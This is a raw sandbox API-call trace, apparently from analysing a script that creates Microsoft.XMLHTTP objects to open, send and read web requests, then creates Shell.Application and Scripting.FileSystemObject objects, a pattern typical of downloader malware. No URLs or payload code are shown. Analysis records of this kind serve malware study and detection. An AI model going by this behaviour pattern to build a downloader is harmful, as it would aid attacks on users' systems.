	[0593.949] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0593.949] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0593.949] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0593.949] longjmp () 
	[0593.949] longjmp () 
	[0593.949] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0593.949] SysStringLen (param_1=0x0) returned 0x0
	[0593.949] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0593.949] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0593.949] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0593.949] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0593.950] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0593.950] ??2@YAPEAX_K@Z () returned 0x62f330
	[0593.950] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0593.950] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0593.950] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0593.950] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0593.950] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0593.950] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0593.950] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0593.950] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0593.950] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0593.950] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0593.950] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0599.259] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0599.259] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0599.259] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0599.259] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0599.260] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0599.260] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0599.260] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0599.260] SysStringLen (param_1=0x0) returned 0x0
	[0599.260] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0599.260] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0599.260] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0599.260] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0599.260] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0599.261] ??2@YAPEAX_K@Z () returned 0x62f350
	[0599.261] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0599.261] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0599.261] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0599.261] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0599.261] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0599.261] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0599.261] SysStringLen (param_1=0x0) returned 0x0
	[0599.261] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0599.265] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0599.265] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0599.265] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0599.265] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0599.265] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0599.265] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0601.284] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0601.285] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0601.285] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0601.286] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0601.286] SysStringLen (param_1=0x0) returned 0x0
	[0601.286] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0601.286] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0601.286] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0601.287] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0601.287] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0601.287] ??2@YAPEAX_K@Z () returned 0x62f330
	[0601.287] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0601.287] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0601.287] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0601.287] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0601.287] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0601.287] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0601.287] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0601.290] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0601.290] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0601.290] SysStringLen (param_1=0x0) returned 0x0
	[0601.290] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0601.290] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0601.290] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74c0) returned 0x0
	[0601.290] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0601.290] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7528) returned 0x0
	[0601.291] ??2@YAPEAX_K@Z () returned 0x62f310
	[0601.291] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7528, pUnkSite=0x62f310) 
	[0601.291] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0601.291] XMLHTTPRequest:IUnknown:Release (This=0x49c7528) returned 0x0
	[0601.291] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74c0) returned 0x0
	[0601.291] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74c0) returned 0x3
	[0601.291] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0601.292] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0601.294] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0601.294] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0601.294] SysStringLen (param_1=0x0) returned 0x0
	[0601.295] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0601.295] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0601.295] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c30) returned 0x0
	[0601.295] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0601.295] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0601.295] ??2@YAPEAX_K@Z () returned 0x62f330
	[0601.295] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f330) 
	[0601.295] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0601.295] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0601.295] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c30) returned 0x0
	[0601.295] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c30) returned 0x3
